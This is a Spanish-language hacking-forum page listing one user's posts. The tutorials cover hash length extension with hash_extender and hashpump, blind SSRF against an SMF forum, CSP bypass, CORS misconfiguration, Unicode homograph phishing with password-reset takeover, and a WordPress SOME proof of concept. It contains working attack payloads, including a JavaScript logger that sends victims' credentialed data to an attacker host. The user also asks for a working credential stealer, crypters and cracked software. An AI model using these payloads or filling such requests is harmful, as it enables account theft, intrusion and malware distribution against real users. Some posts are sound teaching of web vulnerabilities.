Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.

Temas - arthusu

Páginas: [1] 2 3 ... 8
1
Pentesting / Ataque de extension de longitud
« en: Enero 15, 2019, 01:34:51 am »
¿Que es?

En criptografía y seguridad informática, un ataque de extensión de longitud es un tipo de ataque en el que un atacante puede usar el hash y la longitud del mensaje, para calcular el hash de un mensaje controlado por el atacante.

Código de ejemplo:

Código: (php) You are not allowed to view links. Register or Login
<?php

$secret md5('arthusu');

if(isset($_GET['user']))
{
echo md5($secret ':user');
exit;
}

if(isset($_GET['admin']))

echo md5($secret ':admin');
}

$signature md5($secret ':' $_GET['type']); 

if($signature == $_GET['sig'])
{
$data explode(':'$_GET['type']);

if(end($data) == 'admin')
{
echo 'Tu eres administrador';
}
else
{
echo 'Tu eres un usuario';
}
}
else
{
echo 'Firma invalida';
}

?>



Uso:


?user - pedimos la firma para el usuario



?admin - pedimos la firma para el administrador


?sig=xxxx&type=user – donde sig es la firma obtenida y el type el tipo de usuario



En caso de que la palabra no coincida con la firma generada nos va mostrar un mensage un mensaje de error.



 ?sig=xxx&type=admin – nos muestra el usuario administrador

Explotación

Haremos uso de un script:

You are not allowed to view links. Register or Login

You are not allowed to view links. Register or Login


Hash extender en este caso soporta los siguientes hashes para su explotación:

CRC32, MD5, SHA1, SHA256 y SHA512

Ahora identificamos el hash You are not allowed to view links. Register or Login

Introducimos el hash: 38f7e2f0c5eba427ed6b4b47f24814ea (en mi caso es este) y 0/GetImage%2B%25286%2529.png[/img]

Generamos una nueva firma

[email protected]:/mnt/c/users/jaesoto/hash_extender$ ./hash_extender -f md5 -s 38f7e2f0c5eba427ed6b4b47f24814ea  --data 'user' --append ':admin' --secret-min=7 --secret-max=33 --out-data-format=html

Código: (text) You are not allowed to view links. Register or Login

Type: md5

Secret length: 7

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00X%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 8

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%60%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 9

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00h%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 10

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00p%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 11

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00x%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 12

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 13

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%88%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 14

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%90%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 15

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%98%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 16

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%a0%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 17

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%a8%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 18

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%b0%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 19

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%b8%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 20

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%c0%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 21

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%c8%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 22

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%d0%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 23

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%d8%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 24

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%e0%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 25

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%e8%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 26

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%f0%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 27

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%f8%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 28

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%01%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 29

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%08%01%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 30

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%10%01%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 31

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%18%01%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 32

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00+%01%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 33

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%28%01%00%00%00%00%00%00%3aadmin

Donde los parámetros son los siguientes:

-f xxx le indicamos el tipo de hash

-s xxxx le indicamos la firma que tenemos valida

--data 'xxx' le indicamos el dato conocido en este caso user

--append 'xxx' le indicamos el dato que queremos agregarle en este caso :admin con dos puntos por el explode en este caso 

--out-data-format=xxx le indicamos el formato de salida que le va dar

--secret-min=numero le indicamos un numero de tamaño para el secreto como minimo

--secret-max=numero le indicamos un numero de tamaño para el secreto como maximo



El secreto es en lo que se basa este ataque el tamaño del mismo como en este caso hipotéticamente no sabemos su tamaño (aunque si sabemos que la $signature tiene 32 caracteres el tamaño 😉 ) entonces generamos un rango en este caso del 7 al 33 y comenzamos a probar... 1 por 1.



Para realizar la prueba con hashpump lo hacemos de la siguiente manera:


[email protected]:~$ hashpump

Código: (text) You are not allowed to view links. Register or Login
Input Signature: 38f7e2f0c5eba427ed6b4b47f24814ea

Input Data: :user

Input Key Length: 32

Input Data to Add: :admin

12005b20185a5b3feb166cf9017ffa56

:user\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(\x01\x00\x00\x00\x00\x00\x00:admin

Como vemos ingresamos la firma con la comenzamos 38f7e2f0c5eba427ed6b4b47f24814ea

Después el dato con el que comenzamos user

Y el tamaño de la firma en este caso 32

Por ultimo el input agregar es :admin el cual esta en un explode por eso : sino fuera el caso no se agrega



Nos da una nueva firma: 12005b20185a5b3feb166cf9017ffa56

Y un payload: :user\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(\x01\x00\x00\x00\x00\x00\x00:admin



El cual transformamos \x a % quedando asi: 


user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00(%01%00%00%00%00%00%00:admin

Al ejecutar el payload nos da el resultado correcto.


Conclusión:


Estas vulnerabilidades existen realmente en las aplicaciones web, un ejemplo claro de ello lo podemos encontrar en: You are not allowed to view links. Register or Login

Dudas y sugerencias pueden comentar, saludos

Referencia: You are not allowed to view links. Register or Login

2
Hacking ShowOff / [Blind SSRF] Underc0de.org y SMF 2.1
« en: Octubre 27, 2018, 08:03:29 pm »
Anteriormente hice un post sobre este ataque en un blog de un amigo, les dejo el enlace para que le peguen una leída.

You are not allowed to view links. Register or Login

En la pagina oficial de github de SMF viene el siguiente código:



lo que hace aquí es que parsea la url luego manda a pedir por una funcion llamada fetch_web_data()



viendo el código vemos que valida si la url es http, https o ftp.



En caso de que sea http abre socket y realiza la petición. Ok hasta aquí no veo que blacklistee o tenga una whitelist de puertos, o solo servidores de imágenes aceptadas, por lo cual puedes poner cualquier URL sera aceptada.

Con esto comenzaremos el ataque, abriré burp collaborator client:



Copiare la URL que me genera, y la pondré en la parte de ataque que es donde ponemos la URL.



le podemos indicar el puerto en este caso el puerto 80.

Verificamos en burp collaborator que la petición se realiza correctamente, podemos darle poll now para un refresco.



Ahora haremos el Poc, verificamos puertos abiertos de la pagina nmap con nmapxD:



ok sabiendo esto podemos realizar la petición usando Burp Repeater:



Aquí sabemos que el puerto esta abierto por que la respuesta fue 302 found y tardo poco tiempo en responder



Aqui sabemos que el puerto esta cerrado por que la respuesta fue 302 found y tardo mucho tiempo en responder

Tambien existe otro caso en el cual un puerto esta abierto pero tarda mucho en responder y esto pasa por que la coneccion sigue viva:



y termina dando un resultado sin respuesta:



Esto seria todo, creo que se pueden realizar mas cosas pero no estoy seguro, un ataque Dos por ejemplo dejando sockets abiertos o pidiendo un string muy lardo, en este caso no pude ver nada de la red interna por que no se ve reflejado en el body como tal la respuesta. Si alguien tiene alguna idea de como explotar esta vulnerabilidad en este caso mas a fondo que me la haga saber o si me equivoco tambien, saludos

3
Pentesting / Usando Burp con TOR
« en: Septiembre 30, 2018, 12:50:22 pm »
Buenas amigos esto es algo fácil de hacer así que espero hacerlo por pasos y si agregar unas cuantas imágenes.


1.- descargamos TOR: You are not allowed to view links. Register or Login
2.- abrimos el navegador de tor vamos a opciones>proxy de red>Configuración... Verificamos el HOST SOCK en mi caso esta así: IP: 127.0.0.1 PUERTO: 9150



3.- ahora abro mozilla firefox e ingreso lo siguiente:



4.- Me dirijo a Burp>User options>SOCKS Proxy>Ingreso proxy:
IP: 127.0.0.1 PORT: 9150

Seleccionamos la opción: Use SOCKS Proxy y tambien Do DNS Lookups over Sock Proxy.

 

5.- Ingreso a Mi firefox y hago peticiones por ejemplo You are not allowed to view links. Register or Login:

 

4
Pentesting / Como saltar CSP (Content Security Policy)
« en: Septiembre 30, 2018, 12:47:32 pm »
Introduccion

La política de seguridad de contenido (CSP) es un estándar de seguridad informática introducido para evitar la secuencia de comandos (XSS), clickjacking y otros ataques de inyección de código resultantes de la ejecución de código malicioso en el contexto confiable de la pagina web.

Detectando CSP

 


Primeramente vemos una URL que puede ser posiblemente atacada por XSS. Y hacemos la prueba:

 


Vemos como se inyecta nuestro codigo pero no se ejecuta entonces, vamos al apartado de Network de nuestro inspeccionador de elementos y vemos lo siguiente:

 

Un mensaje de error que nos indica claramente como content security police nos esta bloqueando y que solo permite ejecutar scripts del mismo dominio.

Atacar!

El siguiente paso es buscar alguna parte donde se refleje nuestro XSS ya sea un alert, prompt, confirm, etc... puede llegar a ser una imagen, un archivo js, etc...

Primero hay que ver cuales son los dominios que permite para ello vamos hacemos una peticion y vemos la respuesta:




Vemos claramente como se puede solamente inyectar script que sean del mismo dominio. Ejemplo de un vector:

Código: You are not allowed to view links. Register or Login
<script src="http://pentesterlab.com/arthusublog.js?var=alert(1);" />
Donde alert(1) se refleja en el JS.

 


Inyectando el vector en donde se encuentra el XSS podemos realizar el bypass:

 

5
Back-end / Selenium Automatizando el navegador PHP-WebDriver by Facebook
« en: Septiembre 30, 2018, 12:44:00 pm »
¿Que es Selenium?

Selenium automatiza los navegadores. ¡Eso es! Lo que hagas con ese poder depende totalmente de ti. Principalmente, es para automatizar aplicaciones web con fines de prueba, pero ciertamente no se limita a eso. Las tareas de administracion aburridas basadas en la web pueden (y deberian) ser automatizadas tambien.

Selenium tiene el soporte de algunos de los proveedores mas grandes de navegadores que han tomado (o están tomando) pasos para hacer de Selenium una parte nativa de su navegador. También es la tecnología central en muchas otras herramientas de automatización del navegador, API y frameworks.

¿Que parte de Selenium es apropiada para mi?

Selenium Web Driver

Si quieres:
* Cree robustos paquetes y pruebas de automatizacion de regresion basados en el navegador
* Escalar y distribuir scripts en muchos entornos

Selenium IDE

Si quieres:
* Crear scripts rapidos de reproduccion de errores
* Crear scripts para ayudar en las pruebas exploratorias asistidas por la automatizacion.

Descargar Selenium

Puedes dirigirte a la pagina web de Selenium y en la seccion Download: You are not allowed to view links. Register or Login

Puedes elegir la que mas se adapte a tu proyecto ya sea selenium ide o selenium web driver. En este minitutorial mostraremos algo basico de los dos.


Selenium IDE

En caso de que quieras que sea solamente una accion en especifica siempre la misma accion te recomendaria usar Selenium IDE. El cual se encuentra disponible para firefox y chrome en version complemento, yo utilizare para firefox en este caso:
You are not allowed to view links. Register or Login

En el siguiente vídeo veremos como en Selenium entramos a la pagina de mi BLOG, después entramos a una publicación y después volvemos a la pagina inicial, esto es algo básico ya que con Selenium podemos meter datos en un campo, y muchas cosas mas que normalmente podemos hacer manualmente con el navegador.




También puedes exportar tu código a diferentes partes y hacer mas rápido una ejecución.

Selenium Web Driver

¿Que diferencia hay entre Selenium IDE y Selenium Web Driver?

La mayor diferencia es que con Selenium IDE grabamos las cosas y las reproducimos, pero si quieres que algo sea dinamico y con interaccion debes utilizar programacion y con Selenium Web Driver lo puedes lograr.

Lo primero que debemos realizar es descargarnos el driver de nuestra preferencia se encuentra dentro de la misma pagina oficial de selenium, en mi caso seguire usando firefox:

You are not allowed to view links. Register or Login

Hay que agregar el driver a variables de entorno.

Y usare tambien el server standalone de selenium en este caso yo utilizare la version 3.8.1:

You are not allowed to view links. Register or Login

Utilizare el driver de PHP creado por facebook:

You are not allowed to view links. Register or Login

Lo primero a realizar es correr mi server standalone de selenium:



Código: You are not allowed to view links. Register or Login
java -jar selenium-server-standalone-3.8.1.jar -enablePassThrough false
Por ultimo podemos correr nuestro proyecto usando la consola o desde web, no explicare el uso del driver ya que facebook tiene una gran wiki aqui: You are not allowed to view links. Register or Login



Por ultimo decirles que con Selenium tenemos una herramienta poderosa para automatizacion de tareas y podriamos hacer cosas grandiosas con el. Un ejemplo:




Por esta introduccion seria todo y les invito a probar Selenium en sus proyectos de automatizacion.[/font]

6
Dudas y pedidos generales / [SOLUCIONADO] Cursos underc0de y zona vip?
« en: Agosto 27, 2018, 11:09:29 pm »
Hola buenas buenas tiempo sin revisar el foro y estaba viendo que algún contenido todavía es bueno, aunque hay muchos usuarios nuevos que ya no he visto por aquí, quería preguntar sobre una url que encontré creando una herramienta de búsqueda de subdominios, encontré:

You are not allowed to view links. Register or Login

y quería saber para cuando esta este proyecto por lanzarse y si serán cursos de pago o normales y si me puedo unir....

y sobre la zona vip quería ver si tenían alguna zona vip donde podamos compartir contenido blackhat, se que el foro es ético y en eso estamos pero una zona vip que no muchas vean y que pueda ser de pago ayudaría al foro y también al staff a publicar mas cosas de interés a todos, no hice una búsqueda antes pero quería ver que opinan sobre esto, saludos

7
Definición

CORS o intercambio de recursos de origen cruzado, es un mecanismo que permite que recursos restringidos (como por ejemplo, las tipografías) de una pagina web puedan ser solicitados desde un dominio diferente por fuera desde el cual el primer recurso fue expuesto.


Acerca de la vulnerabilidad y como funciona CORS

Los sitios web normalmente habilitan CORS en el mismo origen de la web:

 
Código: You are not allowed to view links. Register or Login
Access-Control-Allow-Origin: https://ejemplo.com
Esto significa que las peticiones que hagan ellos desde otro lugar no se ejecutan ya que estas solo se permiten en el origen del encabezado.



En esta imagen podemos ver un ejemplo de como si hacemos una petición que no venga del origen (o que no quiera compartir con ese origen)que le indicamos la respuesta es bloqueada. Pero en dado caso que si queramos compartir con ese origen la respuesta se realiza:



El servidor también puede habilitar lo que son las credenciales utilizando el siguiente encabezado:

 
Código: You are not allowed to view links. Register or Login
Access-Control-Allow-Credentials: true

Ahora, cuando confiamos en 1 solo origen es muy fácil, pero que pasa si deseamos confiar en mas origenes, esto se da mucho en las You are not allowed to view links. Register or Loginhoy en dia, en las cabeceras se puede agregar uno o mas origenes utilizando un espacio:

 
Código: You are not allowed to view links. Register or Login
Access-Control-Allow-Origin: http://ejemplo1.com http://ejemplo1.net

También se puede hacer uso del comodín * para especificar todos los subdominios, esto no indica que nosotros no podamos crear un subdominio loquesea.ejemplo.com mientras que este ataque podría permitir ver sus recursos compartidos, o simplemente si el dominio tiene en su lista blanca podemos ponernos a pensar formas de evasión ;).

Código: You are not allowed to view links. Register or Login
Access-Control-Allow-Origin: *.ejemplo.com
 Esto peligra cuando usamos * en CORS ya que esta es una mala implementacion la cual deshabilita simplemente el uso de las credenciales aunque estas estén en Verdadero, esto lo podemos ver como lo explica la pagina de Mozilla.

 Entonces explicando esto, si usted ve un servidor o pagina web que emite la cabecera CORS con * el comodin deja lugar a que un atacante pueda especificar en la cabecera el Origen que el desee tal como:

 
Código: You are not allowed to view links. Register or Login
curl https://victima.com -H "Origin: https://atacante.com" -I



 Como resultado podemos ver recursos de otros sitios que no deberíamos poder ver.


Atacar CORS? Poc?


 Entonces, esto de que me sirve? bueno pues gracias a que podemos hacer peticiones donde no deberíamos podemos simplemente hacer un Logger de peticiones que siempre este a la escucha, o simplemente hacer una petición para ver si funciona.

 Primero, hacemos una petición y vemos si acepta nuestro origen.




 Y después vemos la respuesta que nos da la cual permite nuestro dominio.




 Digamos que esa peticion, es una donde se muestran los datos del usuario asi como sus credenciales.

 Podemos hacer un poc y ver como funciona:


 
Código: (javascript) You are not allowed to view links. Register or Login
function cors() {
   var xhttp = new XMLHttpRequest();
   xhttp.onreadystatechange = function() {
     if (this.readyState == 4 && this.status == 200) {
       document.getElementById("demo").innerHTML =     alert(this.responseText);
     }
   };
   xhttp.open("GET", "https://target.com/user/", true);
   xhttp.withCredentials = true;
   xhttp.send();
 }


Esto nos puede dar como resultado, los datos desde cualquier origen.





Siendo asi podemos crear un logger que nos vaya guardando todos los datos.

Código: (javascript) You are not allowed to view links. Register or Login
var req = new XMLHttpRequest();
 req.onload = reqListener;
 req.open('get','https://vulnerablecors.com',true);
 req.withCredentials = true;
 req.send();

  function reqListener() {
     location='http://atacante.com/gracias.php?c='+this.responseText;

  };


Esto es como cuando robas cookies.

El origen Nulo

You are not allowed to view links. Register or Login

La especificacion menciona que esta siendo activada por redirecciones, y algunas publicaciones de stackoverflow mustran que los archivos locales HTML tambien la obtienen. Esto hace que muchos sitios web lo tengan en su lista blanca:

 
Código: You are not allowed to view links. Register or Login
Origin: null
Entonces esto realmente es explotable?


Gracias Shodan.io
You are not allowed to view links. Register or Login+


Conclusión

En conclusion configurar correctamente tus cabeceras tal como CORS puede evitarte que tengas fugas de informacion de tu pagina web y otras personas puedan acceder a tus recursos.



Referencias:

You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login

8
Dudas y pedidos generales / stealer web y crypter
« en: Junio 13, 2018, 02:48:14 pm »
hola en mi epoca existia el istealer 6.3 con el cual podias explotar y funcionaba ahora como los navegadores se actualizaron quisiera saber si todavia existe algun stealer como ese web y que funcione si me podrian recomendar alguno...

tambien habian paginas donde podias conseguir crypters no se si todavia anden o me puedan recomendar alguna

quise usar troyanos pero ahora es diferente ya que las compañias te cobran por abrir puertos ahora...

pero me gusta mas que anda que me recomendaran algun stealer web de antemano muchas gracias, saludos

9
Back-end / Escaner Masivo de Correos
« en: Junio 09, 2017, 01:21:34 pm »




Hola no sabia donde postear esto, es una herramienta que hice hace poco a mas de alguno le debe servir es un escaner masivo de correos, lo que hace es verificar si un correo existe en realidad, de esta manera todos los correos validos se guardan en Ver Emails Validos, muestra los correos en tiempo real, y Hace un reset de Mails validos para volver a realizar otro escaneo. Saludos!

PD: cualquier bug avisarme, saludos

Link: You are not allowed to view links. Register or Login

10
Hola llevo con esto varios dias,  resulta que tengo un cliente al cual le he formateado ya tres veces un servidor windows server 2008 r2 ... el problema es que al parecer otra maquina infecta el servidor cuando estan en red y no me deja acceder a las carpetas...

* no es firewall
* no es el av
* y las configuraciones estan bien

yo creo que es un virus pero no se de ningun virus que haga eso, si alguien me puede apoyar nombrandome virus que hagan eso para buscar como eliminarlo.... ya que es necesario tener carpetas compartidas en ese servidor por que hay un sistema que utiliza la empresa el cual funciona en red con carpeta compartida, por mientras utilizare terminal Service para que se conecten al servidor... alguien podria apoyarme con esto... Saludos

11
Hola Underc0de!, cuanto tiempo :P Jeje bueno queria hacerles unas preguntillas para ver si me podrian apoyar con esto les agradeceria de antemano...

Alguien conocera un buen host que ofrezca:

* Soporte PHP ultimas versiones, y librerias como Curl y PDO
* Que sea rapido al momento de cargar
* En donde pueda crear varios dominios y manejar varias webs y que cobre menos para eso :V

Edit: Ya encontre plantillas en el foro :V

Edit2: Al final me decidi por elegir Hostinger, buen servidor actualizado y necesitaba usar varios dominios y el mismo Hosting para que me quedara mas barato todo :)

Si me pudieran ayudar con esto se los agradeceria mucho comunidad! Saludos cordiales a todos :)

12
Hola amigos!, quisiera saber si pueden ayudarme con esto...



si se fijan en la siguiente imagen hay un rango seleccionado utilizando las herramientas de dibujo de google maps (You are not allowed to view links. Register or Login)

lo que me gustaria saber es alguna forma o si pueden darme algun tip pista, tutorial manual o que leer para poder sacar la superficie y el perimetro del area que seleccione utilizando esta herramienta...

Les estare muy agradecido desde ya gracias

13
Hacking / Homografos Unicode en URL's Y Cambio de Contraseñas
« en: Octubre 19, 2016, 11:17:10 pm »
Hola he estado bastante ocupado y no habia tenido chance de publicar en el BLOG, pero ahora les traigo algo que me parecio interesante en estos dias...
 
 Primero que nada vamos con dos definiciones para dejar los puntos importantes claros!
 
 Homografo
 
 Que se escribe y se pronuncia exactamente igual que otra pero tiene distinto significado.
 
 Unicode
 
 Es un estandar de codificacion de caracteres diseñado para facilitar el tratamiento informatico, transmision y visualizacion de textos de multiples lenguajes y disciplinas tecnicas, ademas de textos clasicos de lenguas muertas.
 
 Muchas personas usaban estos caracteres unicode, recuerdo en la red de metroflog, para usar sus "caritas lindas" al escribir un mensaje.
 
 Aqui les dejo una tabla unicode con los caracteres mas populares:
 You are not allowed to view links. Register or Login
 
 
 Ahora si a lo que vamos...
 
 
You are not allowed to view links. Register or Login

 
 No se si hayan escuchado el termino "phishing" que es cuando atraes al usuario a entrar a una URL donde esta montado un SCAM (pagina falsa) en la cual tus datos importantes son capturados.
 
 Bueno pues la mayoria de estos sitios son identificados por las URL's que manejan son poco "confiables" o simplemente por que son reportadas como tales (paginas phishing), veamos un ejemplo:
 
 You are not allowed to view links. Register or Login
 
 seria una url muy parecida a la de facebook exepto que tiene la "l" ahi... esto seria una buena URL para una pagina falsa... pero que pasa si los caracteres no son mas que parecidos visualmente (homografo)... Ejemplo:
 
 www.facebook.com
 
 si miras esa "f" es una F codificada en Unicode... Pero el dominio sigue siendo el mismo... o Parecido visualmente... Por lo cual la gente puede caer en unos de estos ataques rapidamente (Tambien podemos incluir un open redirect una vulnerabilidad comun hoy en dia).
  Les dejo dos paginas para que puedan realizar esto de una manera ilustrativa:
  You are not allowed to view links. Register or Login
 You are not allowed to view links. Register or Login
   Ahora el otro tipo de ataque que les comentaba era el cambio de contraseñas, por medio de este mismo ataque, hace poco escuche que hicieron un ataque parecido a github.
  Digamos este caso:
  Tenemos un correo que esta registrado en una pagina y se llama:
  [email protected]
  Entonces, nosotros al poner olvide mi contraseña es obvio que va enviar un codigo... al correo o al numero de telefono asociado a la cuenta.
  En caso de que la aplicacion este mal programada podemos hacer uso de un correo muy parecido visualmente (homografo), ejemplo:
 
arthusu@micorreo.com
 
 Cremos un dominio con micorreo.com, y es obvio que nos llegara un correo con el link para establecer una nueva contraseña.
  Eso es todo en esta entrada, no inclui imagenes, no inclui pruebas, pero les dejo la idea por si alguna vez llegasen a intentar el ataque, no creo que se necesiten pruebas pero por si las dudas...
 
Un ejemplo de este ataque: You are not allowed to view links. Register or Login

Anteriormente habia un BUG donde podias Reemplazar al usuario de un foro Usando caracteres unicode, ahora ya no existe (eso no dice que pueda existir)...

14




hola a todos... no se si alguno tendra entre sus cosas el compaq i facturacion electronica y adminpaq crackeado si podria pasarmelo si seria tan amable o algun link?
Estaria agradecido muchas gracias!

15
Pentesting / Robando el codigo del juaker
« en: Agosto 05, 2016, 02:23:24 am »
No dejare explicacion dejare el video y el link, saludos!



Aqui tienen: You are not allowed to view links. Register or Login

16
hola jaja se que tengo rato que no entro y ahora solo para pedir... :P  ;D

Quisiera saber si hay alguien que me pudiera pasar este tema:

You are not allowed to view links. Register or Login

Encontre este:
You are not allowed to view links. Register or Login

Aunque al parecer no te deja meter todos los menus...

Quisiera saber si alguien me podria ayudar con el tema... Desde ya muchas gracias! C:

Saludos a todos

17
Bugs y Exploits / WordPress SOME bug en plupload.flash.swf
« en: Mayo 13, 2016, 04:09:06 am »
Resumen rapido
 
 * SOME en Wordpress 4.5.1
 * Reportado a finales de abril
 * Corregido en Wordpress 4.5.2
 
  Introduccion
 
 Wordpress 4.5.1 es vulnerable de nuevo a You are not allowed to view links. Register or Login vulnerabilidad que se deriva por un proceso de sanatizacion de una URL insegura en el archivo plupload.flash.swf. El codigo en el archivo intenta remover FlashVars en su caso para establecer los parametros por GET pero falla al hacer esto, habilitando XSS via You are not allowed to view links. Register or Login.
 
 El ataque fue descrito por You are not allowed to view links. Register or Login. La vulnerabilidad en plupload.flash.swf fue descubierta en abril del 2016, primeramente identificada como You are not allowed to view links. Register or Login. Entonces, despues el team lo reviso, la completa explotacion fue descubierta y analizada por Heiderich, Filedescriptor, Kinugawa and Inführ. Finalmente, es decubierto, que el archivo viene empaquetado en la ultima version de Wordpress y el problema fue reportado via HackerOne por Heiderich et al.
 
 PoC Simple:  You are not allowed to view links. Register or Login
 
 Un PoC mas complejo fue creado para demostrar el ataque potencial Remote Code Execution (RCE) de esta vulnerabilidad. Una descripcion detallada puede ser encontrada mas abajo:
 
Código: You are not allowed to view links. Register or Login
<button onclick="fire()">Click</button> <script> function fire() {  open('javascript:setTimeout("location=\'http://example.com/wp-includes/js/plupload/plupload.flash.swf?target%g=opener.document.body.firstElementChild.nextElementSibling.nextElementSibling.nextElementSibling.firstElementChild.click&uid%g=hello&\'", 2000)');   setTimeout('location="http://example.com/wp-admin/plugin-install.php?tab=plugin-information&plugin=wp-super-cache&TB_iframe=true&width=600&height=550"') } </script>
Para ver la explicacion a profundidad y el post original:
  You are not allowed to view links. Register or Login

18
Bugs y Exploits / Wordpress XSS en flashmediaelement.swf
« en: Mayo 13, 2016, 03:20:31 am »
